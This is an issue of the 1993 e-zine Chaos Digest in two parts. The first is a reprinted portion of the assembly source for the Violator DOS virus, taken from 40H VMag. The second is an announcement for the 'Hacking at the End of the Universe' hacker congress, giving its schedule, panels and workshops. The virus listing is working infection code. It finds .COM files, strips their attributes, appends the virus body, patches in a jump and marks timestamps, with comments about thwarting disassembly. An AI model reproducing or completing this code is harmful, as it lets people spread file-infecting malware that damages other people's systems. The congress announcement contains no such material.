Chaos Digest Mercredi 19 Mai 1993 Volume 1 : Numero 32

Chaos Digest Mercredi 19 Mai 1993 Volume 1 : Numero 32
ISSN 1244-4901

Editeur: Jean-Bernard Condat ([email protected])
Archiviste: Yves-Marie Crabbe
Co-Redacteurs: Arnaud Bigare, Stephane Briere

TABLE DES MATIERES, #1.32 (19 Mai 1993)
File 1--40H VMag Issue 1 Volume 2 #011(3) (reprint)
File 2--_Hacking at the End of the Universe_ (congres)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
[email protected]
with a mail header or first line containing the following informations:
X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found on some French BBS. Back issues of
ChaosD can be found on the Internet as part of the Computer underground
Digest archives. They're accessible using anonymous FTP from:

* kragar.eff.org [192.88.144.4] in /pub/cud/chaos
* uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
* halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
* ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
* ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
* nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
* orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses. Please
avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Chaos Digest contributors
assume all responsibility for ensuring that articles
submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: [email protected] (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Issue 1 Volume 2 #011(3) (reprint)

[suite du listing du virus Violator]

slash_ok:
MOV [BX+nam_ptr],DI ;Move the filename into workspace
MOV SI,BX ;Restore the original SI value
ADD SI,f_spec ;Point to COM file victim
MOV CX,6
REPZ MOVSB ;Move victim into workspace
MOV SI,BX
MOV AH,4EH
MOV DX,wrk_spc
ADD DX,SI ;DX is ... THE VICTIM!!!
MOV CX,3 ;Attributes of Read Only or Hidden OK
INT 21H
JMP SHORT find_first

find_next:
MOV AH,4FH
INT 21H

find_first:
JNB found_file ;Jump if we found it
JMP SHORT set_subdir;Otherwise, get another subdirectory

found_file:
MOV AX,[SI+dta_tim] ;Get time from DTA
AND AL,1EH ;Mask to remove all but seconds
CMP AL,1EH ;60 seconds
JZ find_next
CMP WORD PTR [SI+dta_len],OFFSET 0FA00H ;Is the file too long?
JA find_next ;If too long, find another one
CMP WORD PTR [SI+dta_len],0AH ;Is it too short?
JB find_next ;Then go find another one
MOV DI,[SI+nam_ptr]
PUSH SI
ADD SI,dta_nam

more_chars:
LODSB
STOSB
CMP AL,0
JNZ more_chars
POP SI
MOV AX,OFFSET 4300H
MOV DX,wrk_spc
ADD DX,SI
INT 21H
MOV [SI+old_att],CX
MOV AX,OFFSET 4301H
AND CX,OFFSET 0FFFEH
MOV DX,wrk_spc
ADD DX,SI
INT 21H
MOV AX,OFFSET 3D02H
MOV DX,wrk_spc
ADD DX,SI
INT 21H
JNB opened_ok
JMP fix_attr

opened_ok:
MOV BX,AX
MOV AX,OFFSET 5700H
INT 21H
MOV [SI+old_tim],CX ;Save file time
MOV [SI+ol_date],DX ;Save the date
MOV AH,2CH
INT 21H
AND DH,7
JMP infect

infect:
MOV AH,3FH
MOV CX,3
MOV DX,first_3
ADD DX,SI
INT 21H ;Save first 3 bytes into the data area
JB fix_time_stamp
CMP AX,3
JNZ fix_time_stamp
MOV AX,OFFSET 4202H
MOV CX,0
MOV DX,0
INT 21H
JB fix_time_stamp
MOV CX,AX
SUB AX,3
MOV [SI+jmp_dsp],AX
ADD CX,OFFSET c_len_y
MOV DI,SI
SUB DI,OFFSET c_len_x

MOV [DI],CX
MOV AH,40H
MOV_CX virlen
MOV DX,SI
SUB DX,OFFSET codelen
INT 21H
JB fix_time_stamp
CMP AX,OFFSET virlen
JNZ fix_time_stamp
MOV AX,OFFSET 4200H
MOV CX,0
MOV DX,0
INT 21H
JB fix_time_stamp
MOV AH,40H
MOV CX,3
MOV DX,SI
ADD DX,jmp_op
INT 21H

fix_time_stamp:
MOV DX,[SI+ol_date]
MOV CX,[SI+old_tim]
AND CX,OFFSET 0FFE0H
OR CX,1EH
MOV AX,OFFSET 5701H
INT 21H
MOV AH,3EH
INT 21H

fix_attr:
MOV AX,OFFSET 4301H
MOV CX,[SI+old_att]
MOV DX,wrk_spc
ADD DX,SI
INT 21H

all_done:
PUSH DS
MOV AH,1AH
MOV DX,[SI+old_dta]
MOV DS,[SI+old_dts]
INT 21H
POP DS

quit:
POP CX
XOR AX,AX ;XOR values so that we will give the
XOR BX,BX ;poor sucker a hard time trying to
XOR DX,DX ;reassemble the source code if he
XOR SI,SI ;decides to dissassemble us.
MOV DI,OFFSET 0100H
PUSH DI
XOR DI,DI
RET 0FFFFH ;Return back to the beginning
;of the program

vir_dat EQU $

intro db '.D$^i*&B)_a.%R',13,10
olddta_ DW 0
olddts_ DW 0
oldtim_ DW 0
count_ DW 0
cntr DB ;Drive to nuke from (C:+++)
oldate_ DW 0
oldatt_ DW 0
first3_ EQU $
INT 20H
NOP
jmpop_ DB 0E9H
jmpdsp_ DW 0
fspec_ DB '*.COM',0
pathad_ DW 0
namptr_ DW 0
envstr_ DB 'PATH='
wrkspc_ DB 40h dup (0)
dta_ DB 16h dup (0)
dtatim_ DW 0,0
dtalen_ DW 0,0
dtanam_ DB 0Dh dup (0)
lst_byt EQU $
virlen = lst_byt - v_start
codelen = vir_dat - v_start
c_len_x = vir_dat - v_start - 2
c_len_y = vir_dat - v_start + 100H
old_dta = olddta_ - vir_dat
old_dts = olddts_ - vir_dat
old_tim = oldtim_ - vir_dat
ol_date = oldate_ - vir_dat
old_att = oldatt_ - vir_dat
first_3 = first3_ - vir_dat
jmp_op = jmpop_ - vir_dat
jmp_dsp = jmpdsp_ - vir_dat
f_spec = fspec_ - vir_dat
path_ad = pathad_ - vir_dat
nam_ptr = namptr_ - vir_dat
env_str = envstr_ - vir_dat
wrk_spc = wrkspc_ - vir_dat
dta = dta_ - vir_dat
dta_tim = dtatim_ - vir_dat
dta_len = dtalen_ - vir_dat
dta_nam = dtanam_ - vir_dat
count = count_ - vir_dat

CODE ENDS
END VCODE

------------------------------

Date: Thu May 20 17:55:14 GMT 1993
From: [email protected] (Announcement posting account )
Subject: File 2--_Hacking at the End of the Universe_ (congres)

=========================================================================
Hack-Tic presents

H A C K I N G

at the E N D of the

U N I V E R S E

1993 SUMMER CONGRESS, THE NETHERLANDS
=========================================================================

H E U ?
+-------

Remember the Galactic Hacker Party back in 1989? Ever wondered what
happened to the people behind it? We sold out to big business, you
think. Think again, we're back!

That's right. On august 4th, 5th and 6th 1993, we're organising a
three-day summer congress for hackers, phone phreaks, programmers,
computer haters, data travellers, electro-wizards, networkers, hardware
freaks, techno-anarchists, communications junkies, cyberpunks, system
managers, stupid users, paranoid androids, Unix gurus, whizz kids, warez
dudes, law enforcement officers (appropriate undercover dress required),
guerilla heating engineers and other assorted bald, long-haired and/or
unshaven scum. And all this in the middle of nowhere (well, the middle
of Holland, actually, but that's the same thing) at the Larserbos
campground four metres below sea level.

The three days will be filled with lectures, discussions and workshops
on hacking, phreaking, people's networks, Unix security risks, virtual
reality, semafun, social engineering, magstrips, lockpicking,
virusses, paranoia, legal sanctions against hacking in Holland and
elsewhere and much, much more. English will be the lingua franca for
this event, although one or two workshops may take place in Dutch.
There will be an Internet connection, an intertent ethernet and social
interaction (both electronic and live). Included in the price are four
nights in your own tent. Also included are inspiration, transpiration, a
shortage of showers (but a lake to swim in), good weather (guaranteed by
god), campfires and plenty of wide open space and fresh air. All of this
for only 100 dutch guilders (currently around US$70).

We will also arrange for the availability of food, drink and smokes of
assorted types, but this is not included in the price. Our bar will be
open 24 hours a day, as well as a guarded depository for valuables
(like laptops, cameras etc.). You may even get your stuff back! For
people with no tent or air matress: you can buy a tent through us for
100 guilders, a matress costs 10 guilders. You can arrive from 17:00
(that's five p.m. for analogue types) on August 3rd. We don't have to
vacate the premises until 12:00 noon on Saturday, August 7 so you can
even try to sleep through the devastating Party at the End of Time
(PET) on the closing night (live music provided). We will arrange for
shuttle buses to and from train stations in the vicinity.

H O W ?
+-------

Payment: in advance please. Un-organized, poor techno-freaks like us
would like to get to the Bahamas at least once. We can only guarantee
you a place if you pay before Friday June 25th, 1993. If you live in
Holland, just transfer fl. 100 to giro 6065765 (Hack-Tic) and mention
'HEU' and your name. If you're in Germany, pay DM 100,- to Hack-Tic,
Konto 2136638, Sparkasse Bielefeld, BLZ 48050161. If you live elsewhere:
call, fax or e-mail us for the best way to get the money to us from your
country. We accept American Express, we do NOT cash ANY foreign cheques.

H A !
+-----

Very Important: Bring many guitars and laptops.

M E ?
+-----

Yes, you! Busloads of alternative techno-freaks from all over the
planet will descend on this event. You wouldn't want to miss that,
now, would you?

Maybe you are part of that select group that has something special to
offer! Participating in 'Hacking at the End of the Universe' is
exciting, but organising your very own part of it is even more fun. We
already have a load of interesting workshops and lectures scheduled,
but we're always on the lookout for more. We're also still in the
market for people who want to help us organize during the congress.

In whatever way you wish to participate, call, write, e-mail or fax us
soon, and make sure your money gets here on time. Space is limited.

S O :
+-----

- 4th, 5th and 6th of August

- Hacking at the End of the Universe
(a hacker summer congress)

- ANWB groepsterrein Larserbos
Zeebiesweg 47
8219 PT Lelystad
The Netherlands

- Cost: fl. 100,- (+/- 70 US$) per person
(including 4 nights in your own tent)

M O R E I N F O :
+-------------------

Hack-Tic
Postbus 22953
1100 DL Amsterdam
The Netherlands

tel : +31 20 6001480
fax : +31 20 6900968
E-mail : [email protected]

V I R U S :
+-----------

If you know a forum or network that you feel this message belongs on,
by all means slip it in. Echo-areas, your favorite bbs, /etc/motd, IRC,
WP.BAT, you name it. Spread the worm, uh, word.

S C HE D U L E
+--------------

day 0 August 3rd, 1993
=====
16:00 You are welcome to set up your tent
19:00 Improvised Dinner

day 1 August 4th, 1993
=====
11:00-12:00 Opening ceremony
12:00-13:30 Workshops
14:00-15:30 Workshops
15:30-19:00 'Networking for the Masses' 16:00-18:00 Workshops
19:00-21:00 Dinner
21:30-23:00 Workshops

day 2 August 5th, 1993
=====
11:30-13:00 Workshops
14:00-17:00 Phreaking the Phone 14:00-17:00 Workshops
17:30-19:00 Workshops
19:00-21:00 Dinner

day 3 August 6th, 1993
=====
11:30-13:00 Workshops
14:00-18:00 Hacking (and) The Law 14:00-17:00 Workshops
18:00-19:00 Closing ceremony
19:00-21:00 Barbeque
21:00-??:?? Party at the End of Time (Live Music)

day 4 August 7th, 1993
=====
12:00 All good things come to an end

'Networking for the masses', Wednesday August 4th 1993, 15:30
+---------------------------------------------------------------

One of the main discussions at the 1989 Galactic Hacker Party focused on
whether or not the alternative community should use computer networking.
Many people felt a resentment against using a 'tool of oppression' for
their own purposes. Computer technology was, in the eyes of many,
something to be smashed rather than used.

Times have changed. Many who were violently opposed to using computers
in 1989 have since discovered word-processing and desktop publishing.
Even the most radical groups have replaced typewriters with PCs. The
'computer networking revolution' has begun to affect the alternative
community.

Not all is well: many obstacles stand in the way of the 'free flow of
information.' Groups with access to information pay such high prices for
it that they are forced to sell information they'd prefer to pass on for
free. Some low-cost alternative networks have completely lost their
democratic structure. Is this the era of the digital dictator, or are we
moving towards digital democracy?

To discuss these and other issues, we've invited the following people
who are active in the field of computer networking: [Electronic mail
addresses for each of the participants are shown in brackets.]

Ted Lindgreen ([email protected]) is managing director of nlnet. Nlnet is the
largest commercial TCP/IP and UUCP network provider in the Netherlands.

Peter van der Pouw Kraan ([email protected]) was actively involved in the
squat-movement newsletters 'Bluf!' and 'NN' and has outspoken ideas
about technology and its relation to society. Had a PC all the way back
in 1985!

Maja van der Velden ([email protected]) is from the Agenda
Foundation which sets up and supports communication and information
projects.

Joost Flint ([email protected]) is from the Activist Press Service.
APS has a bbs and works to get alternative-media and pressure groups
online.

Felipe Rodriquez ([email protected]) is from the Hack-Tic
Network which grew out of the Dutch computer underground and currently
connects thousands of people to the global Internet.

Andre Blum ([email protected]), is an expert in the field of
wireless communications.

Eelco de Graaff ([email protected]) is the
nethost of net 281 of FidoNet, EchoMail troubleshooter, and one of the
founders of the Dutch Fidonet Foundation.

Michael Polman ([email protected]) of the Antenna foundation is a
consultant in the field of international networking. He specialises in
non-governmental networks in the South.

Alfred Heitink ([email protected]) is a social scientist specializing in
the field of computer-mediated communication as well as system manager at
the Dutch Antenna host.

Rena Tangens ([email protected]), was involved in the creation of the
Bionic Mailbox in Bielefeld (Germany) and the Zerberus mailbox network.
She is an artist and wants to combine art and technology.

The discussion will be led by freelance radiomaker and science
journalist Herbert Blankesteyn. He was involved in the 'Archie'
children's bbs of the Dutch VPRO broadcasting corporation.

'Phreaking the Phone', Thursday August 5th 1993, 14:00
+--------------------------------------------------------

Your own telephone may have possibillities you never dreamed possible.
Many years ago people discovered that one could fool the telephone
network into thinking you were part of the network and not just a
customer. As a result, one could make strange and sometimes free
phonecalls to anywhere on the planet. A subculture quickly formed.

The phone companies got wise and made a lot of things (nearly)
impossible. What is still possible today? What is still legal today?
What can they do about it? What are they doing about it?

Billsf ([email protected]) and M. Tillman, a few of the worlds best
phreaks, will introduce the audience to this new world. Phone phreaks
from many different countries will exchange stories of succes and
defeat. Your life may never be the same.

'Hacking (and) The Law', Friday August 6th, 14:00
+---------------------------------------------------

You can use your own computer and modem to access some big computer
system at a university without the people owning that computer knowing
about it. For years this activity was more or less legal in Holland: if
you were just looking around on the Internet and didn't break anything
nobody really cared too much...

That is, until shortly before the new computer crime law went into
effect. Suddenly computer hackers were portrayed as evil 'crashers'
intent on destroying systems or, at least, looking into everyone's
files.

The supporters of the new law said that it was about time something was
done about it. Critics of the law say it's like hunting mosquitoes with
a machine-gun. They claim the aforementioned type of hacking is not the
real problem and that the law is excessively harsh.

To discuss these issues we've invited a panel of experts, some of whom
are, or have been, in touch with the law in one way or another.

Harry Onderwater ([email protected]), is technical EDP auditor at the
Dutch National Criminal Intelligence Service (CRI) and is responsible for
combatting computer crime in the Netherlands. He says he's willing to
arrest hackers if that is what it takes to make computer systems secure.

Prof. Dr. I.S. (Bob) Herschberg ([email protected]), gained
a hacker's control over his first system 21 years ago and never ceased
the good work. Now lecturing, teaching and publishing on computer
insecurity and imprivacy at the technical university in Delft. His
thesis: 'penetrating a system is not perpetrating a crime'.

Ronald 'RGB' O. ([email protected]) has the distinction of being the
only Dutch hacker arrested before and after the new law went into effect.
He is a self-taught UNIX security expert and a writer for Hack-Tic
Magazine.

Ruud Wiggers ([email protected]), system manager at the Free University
(VU) in Amsterdam, has for 10 years been trying to plug holes in system
security. He was involved in the RGB arrest.

Andy Mueller-Maguhn ([email protected]) is from the Chaos Computer Club
in Germany.

Eric Corley ([email protected]) a.k.a. Emmanuel Goldstein is editor
of the hacker publication '2600 magazine'. The first person to realize
the huge implications of the government crackdown on hackers in the US.

Winn Schwartau ([email protected]) is a commercial computer
security advisor as well as the author of the book 'Terminal
Compromise'. His new book entitled 'Information Warfare' has just been
released.

Ray Kaplan ([email protected]) is a computer security consultant.
He is constantly trying to bridge the gap between hackers and the
computer industry. He organizes 'meet the enemy' sessions where system
managers can teleconference with hackers.

Wietse Venema ([email protected]) is a systems expert at the
Technical University in Eindhoven. He is the author of some very well
known utilities to monitor hacking on unix systems. He has a healthy
suspicion of anything technical.

Peter Klerks ([email protected]) is a scientist at the centre
for the study of social antagonism at the Leiden University. He has
studied the Dutch police force extensively, and is author of the book
'Counterterrorism in the Netherlands.'

Don Stikvoort ([email protected]), one of the computer security
experts for the Dutch Academic Society and chairman of CERT-NL (Computer
Emergency Response Team). He is also actively involved in SURFnet
network management.

Rop Gonggrijp ([email protected]) was involved in some of the first
computer break-ins in the Netherlands during the 80's and is now editor
of Hack-Tic Magazine.

The discussion will be led by Franscisco van Jole ([email protected]),
journalist for 'De Volkskrant'.

W O R K S H O P S
+-----------------

HEUnet introduction
an introduction to the Hacking at the End of the Universe network.

Jumpstart to VR, 3D world-building on PC's
Marc Bennett, editor of Black Ice magazine, will explain how to
design worlds on your own PC which can be used in Virtual Reality
systems.

Replacing MS/DOS, Running UNIX on your own PC
People who are already running unix on their PCs will tell you what
unix has to offer and they'll talk about the different flavours in
cheap or free unix software available.

Unix security
RGB and fidelio have probably created more jobs in the unix security
business than the rest of the world put together. They'll talk about
some of the ins and outs of unix security.

E-mail networking
Should we destroy X400 or shall we let it destroy itself?

'User Authorization Failure'
A quick introduction to the VAX/VMS Operating System for those that
consider a carreer in VMS security.

'The right to keep a secret'
Encryption offers you the chance to really keep a secret, and
governments know it. They want you to use locks that they have the
key to. The fight is on!

'Virus about to destroy the earth!'. Don't believe the hype!
What is the real threat of computer viruses? What technical
possibilities are there? Are we being tricked by a fear-machine that
runs on the money spent on anti-virus software?

'It came out of the sky'
'Receiving pager information and what not to do with it'. Information
to pagers is sent through the air without encryption. Rop Gonggrijp
and Bill Squire demonstrate a receiver that picks it all up and
present some spooky scenarios describing what one could do with all
that information.

Cellular phones and cordless phones
How do these systems work, what frequencies do they use, and what are
the differences between different systems world-wide?

Zen and the art of lock-picking.
In this workshop The Key will let you play with cylinder locks of all
types and tell you of ingenious ways to open them.

"Doesn't mean they're not after you"
The secret services and other paranoia.

Audio Adventures
Steffen Wernery and Tim Pritlove talk about adventure games that you
play using a Touch Tone telephone.

Botanical Hacking (THC++)
Using computers, modems and other high tech to grow.

Wireless LAN (Data Radio)
How high a data rate can you pump through the air, and what is still
legal?

Social Engineering
The Dude, well known from his articles in Hack-Tic, will teach you
the basics of social engineering, the skill of manipulating people
within burocracies.

'Hacking Plastic'
Tim and Billsf talk about the security risks in chip-cards, magnetic
cards, credit cards and the like.

Antenna Host Demo
The Antenna Foundation is setting up and supporting computer
networks, mainly in the South. They are operating a host system in
Nijmegen, The Netherlands, and they will demonstrate it in this
workshop, and talk about their activities.

APS Demo
APS (Activist Press Service) is operating a bbs in Amsterdam, The
Netherlands. You'll see it and will be able to play with it
'hands-on'.

'Hocking the arts'
Benten and Marc Marc are computer artists. They present some of their
work under the motto: Hocking the arts, demystifying without losing
its magic contents.

Public Unix Demo
Demonstrating the Hack-Tic xs4all public unix, as well as other
public unix systems.

Packet Radio Demo
Showing the possiblities of existing radio amateur packet radio
equipment to transport packets of data over the airwaves.

COMPUTERS AT 'HACKING AT THE END OF THE UNIVERSE'
+-------------------------------------------------

This will get a little technical for those who want to know what we're
going to set up. If you don't know much about computers, just bring
whatever you have and we'll see how and if we can hook it up.

We're going to have ethernet connected to Internet (TCP/IP). You can
connect by sitting down at one of our PC's or terminals, by hooking up
your own equipment (we have a depository, so don't worry about theft),
or by using one of our 'printerport <--> ethernet' adapters and
hooking up laptops and notebooks that way. There may be a small fee
involved here, we don't know what they're going to cost us. Contact us
for details, also if you have a few of these adapters lying around.
There might also be serial ports you can connect to using a nullmodem
cable.

You can log in to our UNIX system(s) and send and receive mail and
UseNet news that way. Every participant that wants one can get her/his
own IP number to use worldwide. Users of the network are urged to make
whatever files they have on their systems available to others over the
ethernet. Bring anything that has a power cord or batteries and let's
network it!

------------------------------

End of Chaos Digest #1.32
************************************